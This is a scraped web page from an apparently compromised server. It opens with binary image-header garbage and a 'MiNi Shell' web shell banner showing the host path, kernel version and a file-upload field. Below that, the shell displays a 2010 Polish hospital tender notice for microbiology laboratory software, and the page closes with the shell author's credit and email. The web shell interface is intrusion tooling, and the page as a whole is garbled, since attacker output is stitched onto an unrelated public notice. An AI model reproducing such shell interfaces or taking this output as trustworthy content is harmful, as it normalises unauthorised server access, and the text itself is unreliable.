JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100610/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100610/149231-N-2010.html

<p class="kh_header"><b>Wałbrzych: Dostawa oprogramowania dla pracowni mikrobiologii, jego wdrożenie oraz serwisowanie.</b><br>
<b>Numer ogłoszenia: 149231 - 2010; data zamieszczenia: 10.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Specjalistyczny Szpital im. dr Alfreda Sokołowskiego , ul. Sokołowskiego 4, 58-309 Wałbrzych, woj. dolnośląskie, tel. 074 6489742, faks 074 6489746.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdrowie.walbrzych.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa oprogramowania dla pracowni mikrobiologii, jego wdrożenie oraz serwisowanie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Oprogramowanie i wdrożenie Laboratoryjnego bakteriologicznego Systemu Informatycznego dla pracowni mikrobiologii
-	Laboratoryjny System Informatyczny (LSI) obejmuje:
-	oprogramowanie (licencja),
-	podłączenie analizatorów,
-	wdrożenie (instalacje, konfiguracje, szkolenia),
-	nadzór nad działaniem systemu w okresie min 36 m-cy  - (pierwsze 12 m -cy 	bezpłatnie)
-	W celu realizacji zamówienia Zamawiający udostępni sieć komputerową w pomieszczeniach laboratorium i zapewni zdalny dostęp dla serwisu poprzez VPN zainstalowany przez Wykonawcę.
-	Oprogramowanie LSI musi zapewnić obsługę i zarządzanie pracownią mikrobiologii 
Zakres oprogramowania musi objąć obsługę punktu pobrań i lokalną bazę danych, oraz dodatkowe stanowisko z dwoma podłączonymi analizatorami oraz zapewnić dostęp min. trzem pielęgniarkom epidemiologicznym zlokalizowanym w osobnych budynkach.
-	Konfiguracja LSI musi zapewnić pracę w trybie ciągłym 7-7 24-24 i ochronę danych (przed utratą i przed dostępem osób nieupoważnionych).
-	LSI musi zapewnić, w przypadku awarii któregokolwiek z elementów, możliwość uruchomienia i rozpoczęcia pracy (w trybie awaryjnym), w czasie maksimum 4 godzin od zgłoszenia telefonicznego awarii.
-	Wszystkie bezwzględnie wymagane funkcje i możliwości oferowanego oprogramowania muszą posiadać wdrożenia. Zamawiający zastrzega sobie możliwość weryfikacji wdrożenia, w miejscu wskazanym przez Oferenta. Weryfikacja negatywna lub nie wskazanie przez Oferenta miejsca wdrożenia skutkują odrzuceniem oferty.
Minimalne wymagania dla oprogramowania:
Wymagania funkcjonalne:
-	Oprogramowanie 100% w języku polskim, graficzny interfejs użytkownika		
-	Jednokrotna rejestracja danych - raz zapisane dane nie wymaggają powtórnego wpisywania 	
-	Rejestracja pacjentów i zleceń diagnostycznych:
-	prowadzenie kartoteki pacjentów i ich rejestracja, łącznie z datą przyjęcia do szpitala, identyfikacja pacjenta na podstawie różnych danych: demograficznych, nr księgi głównej, identyfikatora zewnętrznego,		
-	rejestracja zleceń (wszystkie badania), od zleceniodawców szpitalnych i zewnętrznych, w tym: 
1.	rejestracja godzin: pobrania, dostarczenia materiału i rejestracji zlecenia,
2.	dokumentacja materiału z wykorzystaniem rozbudowywalnego przez użytkownika słownika materiałów, możliwość szczegółowego opisania w zleceniu,
3.	możliwość rejestrowania danych z wywiadu (przyjmowane leki, zastosowane i planowane leczenie, sugerowany kierunek diagnozy itp.).		
-	całkowicie automatyczny dobór cen dla wykonywanych badań, umożliwiający:
1.	dobór różnych cen za badanie dla różnych płatników,
2.	przypisanie badań różnym płatnikom, bez rejestracji osobnych zleceń,
3.	rejestrację grupy (pakietu) badań o cenie różnej od sumy cen składowych,
4.	zlecenie badania (po ustalonej cenie) wykonywanego na koszt laboratorium,
5.	różnicowanie cen badań mikrobiologicznych w zależności od liczby wyhodowanych organizmów i/lub wykonanych antybiogramów.	
-	automatyczne rozliczanie zleceń, z uwzględnieniem specjalnych ich rodzajów (Cito, Dyżury...), w tym:
1.	możliwość definiowania własnych rodzajów zleceń, 
2.	możliwość przypisania różnych cen tego samego badania w zależności od rodzaju zlecenia (włącznie z rodzajami definiowanymi w laboratorium),
3.	możliwość użycia zdefiniowanego rodzaju zlecenia jako filtru w zestawieniach.		
-	możliwość dopisania badania do istniejącego zle?cenia, bez konieczności ponownego rejestrowania danych administracyjnych,		
-	prowadzenie głównej książki zleceń i możliwość jej wydruku,		
-	Możliwość współpracy z innymi laboratoriami w zakresie automatycznego tworzenia wysyłkowych list zleceń z niektórych badań i zwrotnego odbioru (rejestracji) wyników oraz rozliczeń. Możliwość uwzględnienia takich wyników na zbiorczym formularzu wyniku dla pacjenta.		
-	Możliwość automatycznego (na podsta?wie zleceń) wystawiania rachunków indywidualnych dla pacjentów i okresowych (zbiorczych) dla płatników, z automatycznie prowadzoną dokumentacją.	
-	Proces analityczny:		
-	prowadzenie książek zleceń i wyników w pracowniach, automatycznie sprzężonych z książką główną,		
-	automatyczne kierowanie badań do stanowisk, na których mają być wykonane, z uwzględnieniem alternatywnych metod wykonywania, w tym możliwość przekierowywania badań do innej pracowni 		
-	pełna automatyka sterowania analizatorami diagnostycznymi (programowanie, wysyłanie zleceń, odbiór wyników, przesłanie informacji technicznych), uwzględniająca specyfikę urządzeń,		
-	możliwość wyboru liczby i rodzaju badań do wykonania, zmiany kolejności, przerwania, powtórzenia, wpisania wyniku manualnie, zatwierdzenia - w miarę możliwości obsługiwanego stanowiska (analizatora),		
-	manualna rejestracja wyników,		
-	automatyczny dobór wartości referencyjnych i automatyczne flagowanie wyników, w tym flagowanie wyników będących tekstowymi opisami, z możliwością dowolnej liczby zakresów referencyjnych, osobno dla każdej metody wykonania badania.	
-	możliwość automatycznego zastępowania wyniku liczbowego (poza wskazanym zakresem) odpowiednim tekstem,		
-	elastyczny system rejestracji wyników mikrobiologicznych, uwzględniający:
-	kolejno izolowane organizmy,
-	predefiniowane testy antybiogramowe z definicjami stref wrażliwości, z możliwością modyfikacji (dodawania pojedynczych testów) w trakcie wykonania,
-	przeprowadzone testy identyfikacyjne,
-	ograniczenie dostępnych dla organizmu antybiotyków i mechanizmów oporności,
-	wykonane antybiogramy wraz z parametrami (strefa, MIC)		
-	rejestracja błędów wykonania,	
-	możliwość korzystania ze słowników:
-	stosowanych antybiotyków,
-	organizmów (z podziałem systematycznym),
-	standardowych oporności organizmów,
-	standardowych komentarzy i opisów (np. mechanizmy lekooporności)	
-	autoryzacja wyników, w tym walidacja wyniku, wspólny widok wyników ze wszystkich pracowni, zwalidowanych poprzednich wyników pacjenta, funkcje - delta check,		
-	Możliwość zdalnej, za pośrednictwem publicznej sieci Internet, autoryzacji wyników przez diagnostę laboratoryjnego, z zapewnieniem mu wglądu do wszelkich danych, niezbędnych do pojęcia decyzji  - co najmniej wglądu do wyników badań materiałów pacjentów i wyników kontroli jakości,		
-	możliwość prawnie skutecznego elektronicznego podpisywania wyników, w tym składania podpisu zdalnie, za pośrednictwem publicznej sieci Internet,		
-	drukowanie wyników dla pacjentów i wyników zbiorczych, na zbiorczych i specyficznych formularzach, w tym:
-	możliwość definiowania własnych formularzy,
-	możliwość definiowania dowolnego wzoru formularza wyniku (np. zgodnego z istniejącym dotąd drukiem)  
-	możliwość rezerwacji lub blokady użycia wybranych formularzy dla wskazanych zleceniodawców,
-	drukowanie i wydawanie papierowej postaci dokumentu wyniku podpisanego elektronicznie (prawnie skutecznie) bez konieczności ręcznego podpisywania,		
-	automatyczne (w tle) naliczanie kosztów, z uwzględnieniem metod i powtórzeń,		
-	archiwizacja pełnych wyników diagnostycznych wraz z opisami i uwagami.		
-	Statystyczna analiza wyników (wszystkie wyniki, każdy parametr): średnia, SD, zmiany w czasie, zawężanie kryteriów (okres od-do, grupy wiekowe).		
-	System uprawnień przyznawanych użytkownikom, umożliwiający ochronę danych konfiguracyjnych, osobowych, medycznych i finansowych, 		
-	Automatyczne dokumentowanie wszystkich zapisów i zmian w danych, w tym wpisów i poprawek dotyczących danych pacjentów, zleceń, wyników, finansów i parametrów konfigurujących, zawierające co najmniej zapis kto, kiedy i jakiej dokonał zmiany bądź wpisu.		
-	Rejestracja, śledzenie i odtwarzanie czynności ważnych dla procesu analitycznego (godzina pobrania, rejestracji zlecenia, przyjęcia materiału, wykonania, zatwierdzenia, wydruku -wydania), z podaniem kto i kiedy wykonał, z uwidocznieniem tej informacji na wydruku wyniku.		
-	Statystyka i zestawienia w podziale na co najmniej płatników, zleceniodawców, punkty pobrań, oddziały, lekarzy, analizatory, w podziałach i układach wymaganych przez te podmioty:
-	ilościowe i wartościowe, 
-	rozliczeniowe i kosztowe, 
-	automatyczne sygnalizowanie ognisk epidemiologicznych, 
-	mapy mikrobiologiczne dla określonych  mechanizmów lekooporności, 
-	wskazywanie trendów zmian fenotypów w odniesieniu do lekowrażliwości oraz MIC,
-	uwzględniające definiowane typy zleceń, 
-	grupowanie danych (w ramach wybranego podziału) i sumowanie w grupach 
-	możliwość zbiorczego drukowania wyników		
-	Statystyki mikrobiologiczne dostępne dla upoważnionych osób bezpośrednio z oddziałów.	
-	Moduł magazynowy umożliwiający kontrolę ilości odczynników, materiałów zużywalnych, kalibratorów i kontroli będących na stanie magazynu, ewidencję transakcji oraz wydruk dokumentów magazynowych i statystyki.		
-	Możliwość manualnej korekty skutków działania procedur automatycznych, z sygnalizacją wystąpienia takiej sytuacji.	
-	Możliwość uruchamiania poszczególnych funkcji systemu (np. rejestracja zleceń) z różnych stanowisk (w ramach posiadanych licencji).		
-	W ramach posiadanych licencji użytkownik ma dostęp do konfiguracji i rekonfiguracji danych sterujących automatyczną pracą systemu.		
-	Automatyczna współpraca w zakresie przyj?mowania zleceń i odsyłania wyników, wg standa?rdu HL7, z systemem HIS, satelitarnymi LSI oraz z oprogramowaniem zewnętrznych, niezależnych punktów pobrań.		
-	Możliwość pracy w systemie rozproszonym, udokumentowana minimum jednym wdrożeniem takiego systemu, obejmującego laboratorium centralne i co najmniej 2 laboratoria satelitarne, działające autonomicznie (i niezależnie od połączeń telekomunikacyjnych) i automatycznie zarządzane poprzez konfigurację jednej bazy centralnej.		
-	Możliwość współpracy z autonomicznymi podsystemami specjalistycznymi (mikrobiologiczne, preanalityczne, eksperckie), w zakresie przesyłania zleceń i odbioru wyników.		
-	Automatyczna ekspedycja elektronicznie podpisanych (prawnie skutecznie) wyników do wybranych zleceniodawców w formie elektronicznej.		
-	Możliwość automatycznej publikacji zatwierdzonych wyników w sieci zewnętrznej (Internet) i-lub wewnętrznej (Intranet), dostępnych dla odbiorców za pomocą popularnych przeglądarek web, działających na platformach windows lub linux, z uwzględnieniem systemu uprawnień ograniczającego taki dostęp do podmiotów uprawnionych,		
-	Niezależne, autonomiczne oprogramowanie umożliwiające zlecanie badań z zewnętrznych punktów pobrań przez sieć zewnętrzną (Internet) i/lub wewnętrzną (Intranet) za pomocą popularnych przeglądarek web, z automatyczną rejestracją takich zleceń w systemie.		
-	Architektura klient-serwer.	
-	Możliwość pracy w systemie rozproszonym w kilku lokalizacjach (laboratoriach).		
-	Transmisja danych w systemie w sieci minimum Fast Ethernet 100 Mbit/s.		
-	Podłączenie i automatyczna rejestracja wyników z oferowanych analizatorów oraz innych aparatów wskazanych przez Zamawiającego, w łącznej liczbie do 2 szt. 	
-	Licencja na nieograniczoną liczbę użytkowników, min 3 stacje robocze, nieograniczoną liczbę podłączonych analizatorów, nieograniczona czasowo.		
-	Liczbę licencji na oprogramowanie komunikacyjne podłączonych do systemu analizatorów należy rozumieć jako niezależną od konkretnych typów aparatów. Wymiana analizatora lub zmiana miejsca podłączenia, o ile nie zwiększa łącznej ilości podłączonych aparatów - nie wymaga zmian w dotychczasowych, ani uzyskania nowych licencji.		
-	Automatyczne (bez udziału użytkownika) tworzenie kopii bezpieczeństwa we wskazanym miejscu, możliwość tworzenia dodatkowych kopii zabezpieczających na żądanie użytkownika.		
-	Prowadzenie zdalnego serwisu poprzez łącze internetowe -zestawiony VPN przez Wykonawcę		
-	Baza danych programu zainstalowana na systemie linux		
-	Klient działa w technologii web, niezależnie od platformy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Dostawa oprogramowania dla pracowni mikrobiologii, jego wdrożenie oraz serwisowanie.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 48.00.00.00-8, 48.18.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Kwota wadium wymagana do wzięcia udziału w postępowaniu: 
600,00 zł (słownie: sześćset zł).

DATĄ UZNANIA WPŁATY  BĘDZIE DATA WPŁYWU NA KONTO ZAMAWIAJĄCEGO.

Potwierdzenie wniesienia wadium należy dołączyć do oferty. Oferta nie zabezpieczona akceptowalną formą wadium zostanie odrzucona bez rozpatrywania.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych dostaw w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że dostawy zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenia:
-  o akceptacji warunków płatności,
- o akceptacji SIWZ,
- o spełnianiu przez przedmiot zamówienia wszelkich wymogów Zamawiającego z Zał. nr 1 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> Zp/58/PN-52/10<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego - Dział Zamówień Publicznych i Zaopatrzenia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.06.2010 godzina 10:00, miejsce: SEkretariat Dyrektora Zamawiającego..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com